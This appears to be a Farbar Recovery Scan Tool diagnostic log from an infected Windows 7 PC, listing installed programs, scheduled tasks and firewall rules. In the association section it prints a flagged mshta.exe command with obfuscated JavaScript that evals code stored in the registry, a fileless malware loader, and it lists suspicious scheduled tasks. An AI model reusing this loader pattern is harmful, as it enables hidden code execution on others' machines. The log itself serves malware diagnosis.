2015-12-04 17:41 - 2015-12-04 17:42 - 4216840 _____ (Microsoft Corporation) C:\Users\HP\AppData\Local\Temp\vcredist9_x86.exe
==================== Bamital & volsnap ======================
(There is no automatic fix for files that do not pass verification.)
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
LastRegBack: 2017-04-22 12:00
==================== End of FRST.txt ============================
Addition log:
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 22-04-2017
Ran by HP (22-04-2017 16:57:09)
Running from C:\Users\HP\Desktop
Windows 7 Professional (X64) (2015-09-12 04:16:35)
Boot Mode: Normal
==========================================================
==================== Accounts: =============================
Administrator (S-1-5-21-1988295413-3700943990-1798627009-500 - Administrator - Disabled)
Guest (S-1-5-21-1988295413-3700943990-1798627009-501 - Limited - Disabled)
HP (S-1-5-21-1988295413-3700943990-1798627009-1000 - Administrator - Enabled) => C:\Users\HP
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
AV: Microsoft Security Essentials (Enabled - Up to date) {B7ECF8CD-0188-6703-DBA4-AA65C6ACFB0A}
AS: Microsoft Security Essentials (Enabled - Up to date) {0C8D1929-27B2-688D-E114-9117BD2BB1B7}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Installed Programs ======================
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
"FIFA 14" (HKLM-x32\...\{6049054B-DB11-48E1-A583-9A565D5C8856}_is1) (Version: 1.3.0.0 - )
µTorrent (HKU\S-1-5-21-1988295413-3700943990-1798627009-1000\...\uTorrent) (Version: 3.4.9.43388 - BitTorrent Inc.)
Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 17.009.20044 - Adobe Systems Incorporated)
Adobe Flash Player 25 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 25.0.0.148 - Adobe Systems Incorporated)
AutoHotkey 1.1.22.09 (HKLM\...\AutoHotkey) (Version: 1.1.22.09 - Lexikos)
CLEO 4.3 (HKLM-x32\...\{A8F37EB0-C741-41D7-8CAB-5B40ECEEF094}_is1) (Version: 4.3 - Seemann, Deji, Alien)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Fraps (remove only) (HKLM-x32\...\Fraps) (Version: - )
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 57.0.2987.133 - Google Inc.)
Google Update Helper (x32 Version: 1.3.33.3 - Google Inc.) Hidden
GTA:SA Crash Fix-v2.4 (HKLM-x32\...\GTA:SA Crash Fix-v2.4) (Version: v2.4 - Whitetiger)
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3431 - Intel Corporation)
Java 8 Update 111 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180111F0}) (Version: 8.0.1110.14 - Oracle Corporation)
League of Legends (HKLM-x32\...\League of Legends 4.2.1) (Version: 4.2.1 - Riot Games)
League of Legends (x32 Version: 4.2.1 - Riot Games) Hidden
Lightshot-5.3.0.0 (HKLM-x32\...\{30A5B3C9-2084-4063-A32A-628A98DE512B}_is1) (Version: 5.3.0.0 - Skillbrains)
Metric Collection SDK 35 (x32 Version: 1.2.0010.00 - Lenovo Group Limited) Hidden
Microsoft .NET Framework 4.5.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft Games for Windows - LIVE Redistributable (HKLM-x32\...\{59E4543A-D49D-4489-B445-473D763C79AF}) (Version: 2.0.672.0 - Microsoft Corporation)
Microsoft Office Professional Plus 2013 (HKLM-x32\...\Office15.PROPLUS) (Version: 15.0.4420.1017 - Microsoft Corporation)
Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.8.204.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable - x64 8.0.61000 (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable - x86 8.0.61001 (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{A49F249F-0C91-497F-86DF-B2585E8E76B7}) (Version: 8.0.50727.42 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 Redistributable - x64 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 Redistributable - x86 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{a2199617-3609-410f-a8e8-e8806c73545b}) (Version: 11.0.61030.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{f0080ca2-80ae-4958-b6eb-e8fa916d744a}) (Version: 11.0.61030.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{1a63c099-febd-4eaf-83ad-a82ea4fdac49}) (Version: 12.0.30501.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{b55f7208-e02b-4828-ac78-59c73ddf5bc7}) (Version: 12.0.30501.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 (HKLM-x32\...\{d992c12e-cab2-426f-bde3-fb8c53950b0d}) (Version: 14.0.24215.1 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 Refresh (HKLM-x32\...\{D69C8EDE-BBC5-436B-8E0E-C5A6D311CF4F}) (Version: 4.0.30901.0 - Microsoft Corporation)
Movie Maker (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
MSXML 4.0 SP2 Parser and SDK (HKLM-x32\...\{716E0306-8318-4364-8B8F-0CC4E9376BAC}) (Version: 4.20.9818.0 - Microsoft Corporation)
NVIDIA PhysX (HKLM-x32\...\{3F5C371F-8EA2-4F25-9D3D-D0B4526E3AEA}) (Version: 9.10.0513 - NVIDIA Corporation)
OBS Studio (HKLM-x32\...\OBS Studio) (Version: 18.0.1 - OBS Project)
Outils de vérification linguistique 2013 de Microsoft Office - Français (x32 Version: 15.0.4420.1017 - Microsoft Corporation) Hidden
ParentalControl(x86) (HKU\.DEFAULT\...\ParentalControl) (Version: - )
PowerISO (HKLM-x32\...\PowerISO) (Version: 6.8 - Power Software Ltd)
Project Zomboid (HKLM\...\Steam App 108600) (Version: - The Indie Stone)
Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 8.0.0.9103 - Microsoft Corporation)
Skype™ 7.10 (HKLM-x32\...\{6A0549A9-1B96-498C-ACBC-3943001FEB19}) (Version: 7.10.101 - Skype Technologies S.A.)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
TeamSpeak 3 Client (HKLM-x32\...\TeamSpeak 3 Client) (Version: 3.0.18 - TeamSpeak Systems GmbH)
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.1 - VideoLAN)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation)
WinRAR 5.21 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.21.0 - win.rar GmbH)
==================== Custom CLSID (Whitelisted): ==========================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
CustomCLSID: HKU\S-1-5-21-1988295413-3700943990-1798627009-1000_Classes\CLSID\{820D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> C:\Windows\system32\igfxEM.exe (Intel Corporation)
==================== Scheduled Tasks (Whitelisted) =============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
Task: {09F5CBAD-E307-4F17-A703-07B1F2BF3CE9} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-04-07] (Google Inc.)
Task: {22F66836-DF7B-4793-9F04-FC8E255DD02E} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => %ProgramFiles%\Common Files\Microsoft Shared\Office15\OLicenseHeartbeat.exe
Task: {2ADBDC4B-09A5-4957-8021-596523253262} - System32\Tasks\{B057C60C-3FC4-43D4-86B4-ADB5B47005C4} => pcalua.exe -a "C:\Program Files (x86)\Electronic Arts\Need for Speed Carbon\nfs_uninst.exe" -d "C:\Program Files (x86)\Electronic Arts\Need for Speed Carbon"
Task: {2E6AD43C-9B7E-4B4D-B127-8DDA400429C4} - System32\Tasks\Realtek HD Audio => C:\Users\HP\AppData\Roaming\SecuROM\Realtek HD\rthdcpl.exe [2016-06-12] () <==== ATTENTION
Task: {3325DDD7-BD30-4A5F-8A4F-9241EBE43365} - System32\Tasks\RegIdleBackup => C:\windows\icm32.exe [2017-04-22] ()
Task: {44507965-AB32-45A0-9037-627912BE4D51} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack => C:\Program Files\Microsoft Office\Office15\msoia.exe [2012-10-01] (Microsoft Corporation)
Task: {6FC221A6-B17C-4DBB-9BDF-F541A7FEB435} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-04-07] (Google Inc.)
Task: {9E71D6F2-9FDF-4F84-A08A-4BF032E1A962} - System32\Tasks\{9DC3C148-A635-469D-B6C5-7B48EC8BEC4C} => pcalua.exe -a "C:\Program Files (x86)\TeamSpeak 3 Client\package_inst.exe" -d C:\Users\HP\Desktop -c "C:\Users\HP\Desktop\ts3_overlay-v3.8.23.ts3_plugin"
Task: {B357887E-D687-41F0-BC9B-69046826C8B9} - System32\Tasks\{390B4BC4-913C-42CB-8F5F-90341B4FC536} => pcalua.exe -a C:\Users\HP\Desktop\dotnetfx35.exe -d C:\Users\HP\Desktop
Task: {CA1AB6CF-FE62-42FB-9E4B-6BEA8C94A853} - System32\Tasks\update-S-1-5-21-1988295413-3700943990-1798627009-1000 => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe
Task: {D8CB8877-7922-4C86-B334-D3C83957C2C5} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2017-04-12] (Adobe Systems Incorporated)
Task: {DC6DE3CF-AD1E-4080-A50D-071E517F7760} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2017-02-03] (Adobe Systems Incorporated)
Task: {E4C01461-EB1E-4E90-B5C9-0249077C2782} - System32\Tasks\update-sys => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe
Task: {EDAC11F3-0ABA-47D3-93B3-5907AD49E321} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_25_0_0_148_pepper.exe [2017-04-12] (Adobe Systems Incorporated)
Task: {F4938FDB-88AC-456F-AF11-0A6896012023} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn => C:\Program Files\Microsoft Office\Office15\msoia.exe [2012-10-01] (Microsoft Corporation)
Task: {F7AF3418-358E-4609-9103-5FFAF7774AB2} - System32\Tasks\{86222619-D61C-4F8D-A492-9008F70161F8} => pcalua.exe -a "C:\Users\HP\Downloads\[PC] Medal of Honor Airborne [RIP] [dopeman]\MOHA\Medal of Honor Airborne\UnrealEngine3\Binaries\moha_setup.exe" -d "C:\Users\HP\Downloads\[PC] Medal of Honor Airborne [RIP] [dopeman]\MOHA\Medal of Honor Airborne\UnrealEngine3\Binaries" -c dxlevel 91
Task: {FCAC6AD3-34A7-4EF5-9186-B83F0C45FD1E} - System32\Tasks\Lenovo\Lenovo Customer Feedback Program 64 35 => %ProgramFiles(x86)%\Lenovo\Customer Feedback Program 35\Lenovo.TVT.CustomerFeedback.Agent35.exe
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
Task: C:\Windows\Tasks\update-S-1-5-21-1988295413-3700943990-1798627009-1000.job => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe
Task: C:\Windows\Tasks\update-sys.job => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe
==================== Shortcuts =============================
(The entries could be listed to be restored or removed.)
==================== Loaded Modules (Whitelisted) ==============
2012-10-01 20:34 - 2012-10-01 20:34 - 06522480 _____ () C:\Program Files\Microsoft Office\Office15\1033\GrooveIntlResource.dll
2015-11-14 20:07 - 2015-11-11 14:04 - 01143808 _____ () C:\Program Files\AutoHotkey\AutoHotkey.exe
2017-04-07 20:02 - 2017-03-29 11:47 - 02885464 _____ () C:\Program Files (x86)\Google\Chrome\Application\57.0.2987.133\libglesv2.dll
2017-04-07 20:02 - 2017-03-29 11:47 - 00099672 _____ () C:\Program Files (x86)\Google\Chrome\Application\57.0.2987.133\libegl.dll
2012-10-01 20:33 - 2012-10-01 20:33 - 06522480 _____ () C:\Program Files (x86)\Microsoft Office\Office15\1033\GrooveIntlResource.dll
==================== Alternate Data Streams (Whitelisted) =========
(If an entry is included in the fixlist, only the ADS will be removed.)
AlternateDataStreams: C:\ProgramData:NT [40]
AlternateDataStreams: C:\ProgramData:NT2 [344]
AlternateDataStreams: C:\Users\All Users:NT [40]
AlternateDataStreams: C:\Users\All Users:NT2 [344]
AlternateDataStreams: C:\ProgramData\Application Data:NT [40]
AlternateDataStreams: C:\ProgramData\Application Data:NT2 [344]
AlternateDataStreams: C:\Users\HP\Application Data:NT [40]
AlternateDataStreams: C:\Users\HP\Application Data:NT2 [344]
AlternateDataStreams: C:\Users\HP\AppData\Roaming:NT [40]
AlternateDataStreams: C:\Users\HP\AppData\Roaming:NT2 [344]
==================== Safe Mode (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
==================== Association (Whitelisted) ===============
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
HKU\.DEFAULT\Software\Classes\23352ea4: "C:\Windows\system32\mshta.exe" "javascript:fX5Ma="nNrr";JA1=new ActiveXObject("WScript.Shell");CSc4J="v9eFQB";o3BHJ5=JA1.RegRead("HKCU\\software\\uafzn\\pasf");Gb9xLXb="36Ad";eval(o3BHJ5);lnG1a="d";" <===== ATTENTION
==================== Internet Explorer trusted/restricted ===============
(If an entry is included in the fixlist, it will be removed from the registry.)
==================== Hosts content: ===============================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2009-07-14 05:34 - 2017-04-21 08:55 - 00007289 ____A C:\Windows\system32\Drivers\etc\hosts
==================== Other Areas ============================
(Currently there is no automatic fix for this section.)
HKU\S-1-5-21-1988295413-3700943990-1798627009-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\HP\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 8.8.8.8 - 8.8.4.4
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.
==================== MSCONFIG/TASK MANAGER disabled items ==
==================== FirewallRules (Whitelisted) ===============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [TCP Query User{7B1118C8-6331-4F74-8930-1167DA5E3E26}C:\users\hp\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\hp\appdata\roaming\utorrent\utorrent.exe
FirewallRules: [UDP Query User{2CC20DD6-01D5-4490-89A6-147032A36F9D}C:\users\hp\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\hp\appdata\roaming\utorrent\utorrent.exe
FirewallRules: [TCP Query User{EE098C1C-5469-4A60-ACCA-42A705D3434A}C:\program files (x86)\fifa 14\game\fifa14.exe] => (Allow) C:\program files (x86)\fifa 14\game\fifa14.exe
FirewallRules: [UDP Query User{F9D27D5B-4A48-4C94-83FE-494AE9427821}C:\program files (x86)\fifa 14\game\fifa14.exe] => (Allow) C:\program files (x86)\fifa 14\game\fifa14.exe
FirewallRules: [TCP Query User{18CB8871-1737-4200-8959-A06B9C8458E7}C:\users\hp\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\hp\appdata\roaming\utorrent\utorrent.exe
FirewallRules: [UDP Query User{FE39E1A7-3BCE-47B8-ADDE-41D1A07E2006}C:\users\hp\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\hp\appdata\roaming\utorrent\utorrent.exe
FirewallRules: [TCP Query User{639E2C2B-16A6-4DDC-BA2F-D0118B46FD94}C:\program files (x86)\mta san andreas 1.5\server\mta server.exe] => (Allow) C:\program files (x86)\mta san andreas 1.5\server\mta server.exe
FirewallRules: [UDP Query User{B94F2984-11FB-4AD7-887A-50732770D7CA}C:\program files (x86)\mta san andreas 1.5\server\mta server.exe] => (Allow) C:\program files (x86)\mta san andreas 1.5\server\mta server.exe
FirewallRules: [TCP Query User{BA364FC7-24DC-4A1A-A664-50B3D4A8787D}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [UDP Query User{62099E17-A9FD-4F61-978E-900F47541AD0}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [TCP Query User{A3C7731C-C901-4AED-8606-788E21702FC6}C:\users\hp\downloads\project_zomboid_build_33.5\project_zomboid_build_33.5\project_zomboid_build_33.5\projectzomboid64.exe] => (Allow) C:\users\hp\downloads\project_zomboid_build_33.5\project_zomboid_build_33.5\project_zomboid_build_33.5\projectzomboid64.exe
FirewallRules: [UDP Query User{0DBE3ACB-D74C-4760-AD7C-63874D80219F}C:\users\hp\downloads\project_zomboid_build_33.5\project_zomboid_build_33.5\project_zomboid_build_33.5\projectzomboid64.exe] => (Allow) C:\users\hp\downloads\project_zomboid_build_33.5\project_zomboid_build_33.5\project_zomboid_build_33.5\projectzomboid64.exe
FirewallRules: [TCP Query User{1B48C685-D696-4B92-B371-FF1F999C1240}C:\users\hp\desktop\samp037_svr_r2-1-1_win32\samp-server.exe] => (Allow) C:\users\hp\desktop\samp037_svr_r2-1-1_win32\samp-server.exe
FirewallRules: [UDP Query User{E0FC5156-76FB-4CE7-B1A7-C717BA03DC61}C:\users\hp\desktop\samp037_svr_r2-1-1_win32\samp-server.exe] => (Allow) C:\users\hp\desktop\samp037_svr_r2-1-1_win32\samp-server.exe
FirewallRules: [TCP Query User{EE118442-1EF2-4B6F-A3A3-5BF7DF60D798}C:\users\hp\desktop\texture studio\samp-server.exe] => (Allow) C:\users\hp\desktop\texture studio\samp-server.exe
FirewallRules: [UDP Query User{E9C3F6D7-8819-4D97-8404-70B0BACD5DAD}C:\users\hp\desktop\texture studio\samp-server.exe] => (Allow) C:\users\hp\desktop\texture studio\samp-server.exe
FirewallRules: [TCP Query User{312991FA-EB93-4EF3-9439-F83B1B183571}C:\users\hp\downloads\project.zomboid.build.32.30\project.zomboid.build.32.30\projectzomboid64.exe] => (Allow) C:\users\hp\downloads\project.zomboid.build.32.30\project.zomboid.build.32.30\projectzomboid64.exe
FirewallRules: [UDP Query User{15EF6B01-90B6-431F-9F8B-EDEFAAADFAA9}C:\users\hp\downloads\project.zomboid.build.32.30\project.zomboid.build.32.30\projectzomboid64.exe] => (Allow) C:\users\hp\downloads\project.zomboid.build.32.30\project.zomboid.build.32.30\projectzomboid64.exe
FirewallRules: [{97CF9C87-D4EC-40EB-9A08-BCF03A686954}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{64B9E22B-95AD-4020-AE0D-D9BFAB7323DC}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{E84A0326-576C-4A54-9086-AAA0906B612D}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{E9835C84-696D-418C-8B99-ADE9F33CD05E}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [TCP Query User{441CC1D9-CABF-4C9B-8F92-B66276FA97FF}C:\program files (x86)\repack by s.l\spintires\launcher.exe] => (Allow) C:\program files (x86)\repack by s.l\spintires\launcher.exe
FirewallRules: [UDP Query User{AFB9A356-C652-4859-AC2D-F1E7B6A0F06B}C:\program files (x86)\repack by s.l\spintires\launcher.exe] => (Allow) C:\program files (x86)\repack by s.l\spintires\launcher.exe
FirewallRules: [TCP Query User{EC646AD1-5D56-41D2-926F-C12EA6261B6F}C:\users\hp\downloads\3dmgame-7.days.to.die.alpha.13.6.steam.edition.x64.cracked-3dm\3dmgame-7.days.to.die.alpha.13.6.steam.edition.x64.cracked-3dm\7 days to die\7daystodie.exe] => (Allow) C:\users\hp\downloads\3dmgame-7.days.to.die.alpha.13.6.steam.edition.x64.cracked-3dm\3dmgame-7.days.to.die.alpha.13.6.steam.edition.x64.cracked-3dm\7 days to die\7daystodie.exe
FirewallRules: [UDP Query User{17D0503A-5B06-4918-A320-CB58C49EC9F5}C:\users\hp\downloads\3dmgame-7.days.to.die.alpha.13.6.steam.edition.x64.cracked-3dm\3dmgame-7.days.to.die.alpha.13.6.steam.edition.x64.cracked-3dm\7 days to die\7daystodie.exe] => (Allow) C:\users\hp\downloads\3dmgame-7.days.to.die.alpha.13.6.steam.edition.x64.cracked-3dm\3dmgame-7.days.to.die.alpha.13.6.steam.edition.x64.cracked-3dm\7 days to die\7daystodie.exe
FirewallRules: [TCP Query User{3E3653FB-F2AB-4E49-981B-BC7652AC5D96}C:\program files (x86)\steam\steamapps\common\projectzomboid\jre64\bin\java.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\projectzomboid\jre64\bin\java.exe
FirewallRules: [UDP Query User{2BCB61E3-55D6-4A18-BFAF-3259606EFB0D}C:\program files (x86)\steam\steamapps\common\projectzomboid\jre64\bin\java.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\projectzomboid\jre64\bin\java.exe
FirewallRules: [TCP Query User{3822C677-6992-4900-AE6A-789C7B3D610A}C:\program files (x86)\steam\steamapps\common\war thunder\win64\aces.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\war thunder\win64\aces.exe
FirewallRules: [UDP Query User{729F518E-2172-4AF2-A625-5DDB66A1318C}C:\program files (x86)\steam\steamapps\common\war thunder\win64\aces.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\war thunder\win64\aces.exe
FirewallRules: [TCP Query User{9145617F-9A87-4EC9-96D7-61DC88A0B3AA}C:\program files (x86)\steam\steamapps\common\war thunder\aces.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\war thunder\aces.exe
FirewallRules: [UDP Query User{1DBD55A9-434E-44B6-B95E-626ACAC6C68C}C:\program files (x86)\steam\steamapps\common\war thunder\aces.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\war thunder\aces.exe
FirewallRules: [TCP Query User{9D4BEF11-6C5D-4188-8EE0-809ABFA64121}C:\program files\strogino cs portal\garrys mod\hl2.exe] => (Allow) C:\program files\strogino cs portal\garrys mod\hl2.exe
FirewallRules: [UDP Query User{3C2E631E-9993-43F8-8CA4-9DB4D57A9C8A}C:\program files\strogino cs portal\garrys mod\hl2.exe] => (Allow) C:\program files\strogino cs portal\garrys mod\hl2.exe
FirewallRules: [TCP Query User{23049537-345E-49E4-81F7-7F7208582A6F}C:\games\scrap mechanic v0.1.13\release\scrapmechanic.exe] => (Allow) C:\games\scrap mechanic v0.1.13\release\scrapmechanic.exe
FirewallRules: [UDP Query User{682CAF12-DAA5-457A-AC7A-5608C4A6A8F8}C:\games\scrap mechanic v0.1.13\release\scrapmechanic.exe] => (Allow) C:\games\scrap mechanic v0.1.13\release\scrapmechanic.exe
FirewallRules: [{6199E943-BD95-4404-9F5C-CB98B6795C82}] => (Allow) C:\Program Files (x86)\Rockstar Games\Rockstar Games Social Club\RGSCLauncher.exe
FirewallRules: [{12CFF736-4509-4656-A63A-5A335B9C9E6D}] => (Allow) C:\Program Files (x86)\Rockstar Games\Rockstar Games Social Club\RGSCLauncher.exe
FirewallRules: [TCP Query User{6279ECB1-93CB-4DB6-9241-A56B0D65AAC2}C:\users\hp\downloads\call.of.duty.4.modern.warfare.full-rip\call of duty 4 - modern warfare\iw3mp.exe] => (Allow) C:\users\hp\downloads\call.of.duty.4.modern.warfare.full-rip\call of duty 4 - modern warfare\iw3mp.exe
FirewallRules: [UDP Query User{3B26002E-C2A1-406F-A8F8-D34AA6FC865D}C:\users\hp\downloads\call.of.duty.4.modern.warfare.full-rip\call of duty 4 - modern warfare\iw3mp.exe] => (Allow) C:\users\hp\downloads\call.of.duty.4.modern.warfare.full-rip\call of duty 4 - modern warfare\iw3mp.exe
FirewallRules: [TCP Query User{2358DAF6-5B72-40A1-B1CA-289285EF57E4}C:\users\hp\downloads\call.of.duty.4.modern.warfare.full-rip\call of duty 4 - modern warfare\iw3mp.exe] => (Block) C:\users\hp\downloads\call.of.duty.4.modern.warfare.full-rip\call of duty 4 - modern warfare\iw3mp.exe
FirewallRules: [UDP Query User{98626F0A-4AB3-4F44-9DA0-061F4A9B9051}C:\users\hp\downloads\call.of.duty.4.modern.warfare.full-rip\call of duty 4 - modern warfare\iw3mp.exe] => (Block) C:\users\hp\downloads\call.of.duty.4.modern.warfare.full-rip\call of duty 4 - modern warfare\iw3mp.exe
FirewallRules: [{CF5A6A3D-B63C-4355-8AAE-3CD4FB43C095}] => (Allow) C:\Program Files (x86)\Ubisoft\FarCry 3\bin\farcry3.exe
FirewallRules: [{C0B968E3-B62A-4EBA-8E08-5C46A97AB7AF}] => (Allow) C:\Program Files (x86)\Ubisoft\FarCry 3\bin\farcry3.exe
FirewallRules: [{FE5DDD9A-0167-4DA2-BA44-A5D1D5F76663}] => (Allow) C:\Program Files (x86)\Ubisoft\FarCry 3\bin\farcry3_d3d11.exe
FirewallRules: [{B49D92AC-3633-450D-A5FC-57947761C231}] => (Allow) C:\Program Files (x86)\Ubisoft\FarCry 3\bin\farcry3_d3d11.exe
FirewallRules: [{754473EF-15C8-49B8-9276-670737590704}] => (Allow) C:\Program Files (x86)\Ubisoft\FarCry 3\bin\FC3Updater.exe
